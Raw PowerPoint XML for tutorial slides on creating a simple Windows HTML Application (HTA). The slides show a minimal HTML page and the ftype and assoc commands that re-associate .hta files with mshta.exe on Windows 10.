        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1189997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1039913780"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="913904" y="3036093"/>
          <a:ext cx="7254578" cy="3705275"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="411068"/>
                <a:gridCol w="6843510"/>
              </a:tblGrid>
              <a:tr h="3705275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>11</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>12</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AFAFAF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>13</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;!DOCTYPE html&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;html </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>lang</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>en</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>"&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;head&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>    &lt;title&gt;A Simple Webpage&lt;/title&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;/head&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;body&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>    &lt;h1&gt;Heading&lt;/h1&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>    &lt;p&gt;This is a paragraph.&lt;/p&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;/body&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00A249"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&lt;/html&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="338328"/>
            <a:ext cx="7704856" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Create a Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTA – Step 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alex Hedley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187624" y="2417693"/>
            <a:ext cx="666023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zh-TW" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a new file with the extension of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="20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.html</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>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zh-TW" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let's call it </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="20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Simple</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea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zh-TW" sz="700" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW"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569333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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the following two commands as administrator:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Add file type with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ftype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>htafile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=C:\Windows\SysWOW64\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %* </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Associate .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> extension with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>htafile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Then sign out and re-sign in to your account.</a:t>
            </a:r>
          </a:p>
          <a:p>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Enable HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>on Windows 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Biswapriyo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2593312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57781" y="2171411"/>
            <a:ext cx="4218276" cy="537509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Result shown on a web page.</a:t>
            </a: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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="332656"/>
            <a:ext cx="7200800" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Create a Simple HTA – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Step 2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alex Hedley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
